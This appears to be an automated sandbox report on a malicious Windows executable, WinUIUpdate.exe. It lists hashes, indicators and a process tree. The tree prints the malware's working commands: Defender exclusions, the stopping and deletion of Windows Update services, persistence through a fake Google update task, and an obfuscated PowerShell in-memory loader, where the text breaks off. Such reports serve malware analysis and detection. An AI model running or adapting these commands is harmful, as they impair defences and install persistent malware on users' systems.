6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

Resubmissions

20-03-2023 12:07

230320-pad1ssfd7y 10

20-03-2023 09:30

230320-lgw86scg49 10

Analysis

max time kernel
40s
max time network
91s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
20-03-2023 09:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinUIUpdate.exe
Size

3.7MB
MD5

b0a84e4330a9c00c57d3a3e7885f7946
SHA1

bfe5f9b94081c25827e2bc90bb39a8c701033519
SHA256

6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
SHA512

a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
SSDEEP

98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

WinUIUpdate.exepowershell.EXE

description	pid	process	target process
PID 2552 created 3184	2552	WinUIUpdate.exe	Explorer.EXE
PID 2552 created 3184	2552	WinUIUpdate.exe	Explorer.EXE
PID 2552 created 3184	2552	WinUIUpdate.exe	Explorer.EXE
PID 2552 created 3184	2552	WinUIUpdate.exe	Explorer.EXE
PID 2552 created 3184	2552	WinUIUpdate.exe	Explorer.EXE
PID 4964 created 596	4964	powershell.EXE	winlogon.exe

Drops file in Drivers directory 1 IoCs

Processes:

WinUIUpdate.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts WinUIUpdate.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	WinUIUpdate.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

Processes:

WinUIUpdate.exepowershell.EXE

description	pid	process	target process
PID 2552 set thread context of 3752	2552	WinUIUpdate.exe	dialer.exe
PID 4964 set thread context of 2076	4964	powershell.EXE	dllhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

WinUIUpdate.exe

description ioc process

File created C:\Program Files\Google\Chrome\chromeupdater.exe WinUIUpdate.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3896 sc.exe
4020 sc.exe
4748 sc.exe
3640 sc.exe
1892 sc.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\chromeupdater.exe	WinUIUpdate.exe

pid	process
3896	sc.exe
4020	sc.exe
4748	sc.exe
3640	sc.exe
1892	sc.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

WinUIUpdate.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exe

pid	process
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
4648	powershell.exe
4648	powershell.exe
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
520	powershell.exe
520	powershell.exe
2552	WinUIUpdate.exe
2552	WinUIUpdate.exe
4964	powershell.EXE
4964	powershell.EXE
1976	powershell.EXE
1976	powershell.EXE
4964	powershell.EXE
2076	dllhost.exe
2076	dllhost.exe
2076	dllhost.exe
2076	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4500	powercfg.exe
Token: SeCreatePagefilePrivilege	4500	powercfg.exe
Token: SeDebugPrivilege	520	powershell.exe
Token: SeShutdownPrivilege	4464	powercfg.exe
Token: SeCreatePagefilePrivilege	4464	powercfg.exe
Token: SeShutdownPrivilege	3364	powercfg.exe
Token: SeCreatePagefilePrivilege	3364	powercfg.exe
Token: SeShutdownPrivilege	2712	powercfg.exe
Token: SeCreatePagefilePrivilege	2712	powercfg.exe
Token: SeIncreaseQuotaPrivilege	520	powershell.exe
Token: SeSecurityPrivilege	520	powershell.exe
Token: SeTakeOwnershipPrivilege	520	powershell.exe
Token: SeLoadDriverPrivilege	520	powershell.exe
Token: SeSystemProfilePrivilege	520	powershell.exe
Token: SeSystemtimePrivilege	520	powershell.exe
Token: SeProfSingleProcessPrivilege	520	powershell.exe
Token: SeIncBasePriorityPrivilege	520	powershell.exe
Token: SeCreatePagefilePrivilege	520	powershell.exe
Token: SeBackupPrivilege	520	powershell.exe
Token: SeRestorePrivilege	520	powershell.exe
Token: SeShutdownPrivilege	520	powershell.exe
Token: SeDebugPrivilege	520	powershell.exe
Token: SeSystemEnvironmentPrivilege	520	powershell.exe
Token: SeRemoteShutdownPrivilege	520	powershell.exe
Token: SeUndockPrivilege	520	powershell.exe
Token: SeManageVolumePrivilege	520	powershell.exe
Token: 33	520	powershell.exe
Token: 34	520	powershell.exe
Token: 35	520	powershell.exe
Token: 36	520	powershell.exe
Token: SeIncreaseQuotaPrivilege	520	powershell.exe
Token: SeSecurityPrivilege	520	powershell.exe
Token: SeTakeOwnershipPrivilege	520	powershell.exe
Token: SeLoadDriverPrivilege	520	powershell.exe
Token: SeSystemProfilePrivilege	520	powershell.exe
Token: SeSystemtimePrivilege	520	powershell.exe
Token: SeProfSingleProcessPrivilege	520	powershell.exe
Token: SeIncBasePriorityPrivilege	520	powershell.exe
Token: SeCreatePagefilePrivilege	520	powershell.exe
Token: SeBackupPrivilege	520	powershell.exe
Token: SeRestorePrivilege	520	powershell.exe
Token: SeShutdownPrivilege	520	powershell.exe
Token: SeDebugPrivilege	520	powershell.exe
Token: SeSystemEnvironmentPrivilege	520	powershell.exe
Token: SeRemoteShutdownPrivilege	520	powershell.exe
Token: SeUndockPrivilege	520	powershell.exe
Token: SeManageVolumePrivilege	520	powershell.exe
Token: 33	520	powershell.exe
Token: 34	520	powershell.exe
Token: 35	520	powershell.exe
Token: 36	520	powershell.exe
Token: SeIncreaseQuotaPrivilege	520	powershell.exe
Token: SeSecurityPrivilege	520	powershell.exe
Token: SeTakeOwnershipPrivilege	520	powershell.exe
Token: SeLoadDriverPrivilege	520	powershell.exe
Token: SeSystemProfilePrivilege	520	powershell.exe
Token: SeSystemtimePrivilege	520	powershell.exe
Token: SeProfSingleProcessPrivilege	520	powershell.exe
Token: SeIncBasePriorityPrivilege	520	powershell.exe
Token: SeCreatePagefilePrivilege	520	powershell.exe
Token: SeBackupPrivilege	520	powershell.exe
Token: SeRestorePrivilege	520	powershell.exe
Token: SeShutdownPrivilege	520	powershell.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

cmd.execmd.exeWinUIUpdate.exepowershell.EXEdllhost.exelsass.exe

description	pid	process	target process
PID 4480 wrote to memory of 1892	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 1892	4480	cmd.exe	sc.exe
PID 1820 wrote to memory of 4500	1820	cmd.exe	powercfg.exe
PID 1820 wrote to memory of 4500	1820	cmd.exe	powercfg.exe
PID 1820 wrote to memory of 4464	1820	cmd.exe	powercfg.exe
PID 1820 wrote to memory of 4464	1820	cmd.exe	powercfg.exe
PID 4480 wrote to memory of 3896	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 3896	4480	cmd.exe	sc.exe
PID 1820 wrote to memory of 3364	1820	cmd.exe	powercfg.exe
PID 1820 wrote to memory of 3364	1820	cmd.exe	powercfg.exe
PID 4480 wrote to memory of 4020	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 4020	4480	cmd.exe	sc.exe
PID 1820 wrote to memory of 2712	1820	cmd.exe	powercfg.exe
PID 1820 wrote to memory of 2712	1820	cmd.exe	powercfg.exe
PID 4480 wrote to memory of 4748	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 4748	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 3640	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 3640	4480	cmd.exe	sc.exe
PID 4480 wrote to memory of 3316	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 3316	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 4688	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 4688	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 3624	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 3624	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 3124	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 3124	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 4200	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 4200	4480	cmd.exe	reg.exe
PID 2552 wrote to memory of 3752	2552	WinUIUpdate.exe	dialer.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 4964 wrote to memory of 2076	4964	powershell.EXE	dllhost.exe
PID 2076 wrote to memory of 596	2076	dllhost.exe	winlogon.exe
PID 2076 wrote to memory of 680	2076	dllhost.exe	lsass.exe
PID 2076 wrote to memory of 956	2076	dllhost.exe	svchost.exe
PID 2076 wrote to memory of 332	2076	dllhost.exe	dwm.exe
PID 2076 wrote to memory of 412	2076	dllhost.exe	svchost.exe
PID 2076 wrote to memory of 392	2076	dllhost.exe	svchost.exe
PID 680 wrote to memory of 2444	680	lsass.exe	sysmon.exe
PID 2076 wrote to memory of 624	2076	dllhost.exe	svchost.exe
PID 2076 wrote to memory of 1060	2076	dllhost.exe	svchost.exe
PID 2076 wrote to memory of 1072	2076	dllhost.exe	svchost.exe
PID 2076 wrote to memory of 1084	2076	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b4e99f36-8f50-425b-a6e2-b79deef003ac}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3184
- C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4648
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3364
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1892
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3896
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4020
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4748
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3640
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3316
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4688
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:3624
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3124
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:520
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3752

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1060
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:ycehjArcBfQt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KRMOtLpZVChuQf,[Parameter(Position=1)][Type]$pOBqjEyGgk)$qZiPpcrGfpt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+'eleg'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e','Cl'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+'e'+'al'+[Char](101)+'d'+[Char](44)+'An'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+','+''+'A'+'u'+[Char](116)+''+[Char](111)+'Class',[MulticastDelegate]);$qZiPpcrGfpt.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$KRMOtLpZVChuQf).SetImplementationFlags('Run'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+'d');$qZiPpcrGfpt.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'Slo'+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l',$pOBqjEyGgk,$KRMOtLpZVChuQf).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+'e,Ma'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $qZiPpcrGfpt.CreateType();}$AAcrQfwqmNutz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+'ft'+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+'A'+''+'A'+'c'+[Char](114)+''+[Char](81)+''+[Char](102)+''+'w'+''+[Char](113)+''+[Char](109)+''+[Char](78)+''+[Char](117)+''+'t'+'z');$tkSkKARixqEpPh=$AAcrQfwqmNutz.GetMethod(''+'t'+''+[Char](107)+''+[Char](83)+'k'+'K'+''+[Char](65)+''+'R'+''+[Char](105)+''+[Char](120)+''+'q'+''+[Char](69)+''+[Char](112)+''+[Char](80)+'h',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oQGyqEdvFhqngAahMhS=ycehjArcBfQt @([String])([IntPtr]);$ZTbHheZwZOmjdNUBssLTJG=ycehjArcBfQt 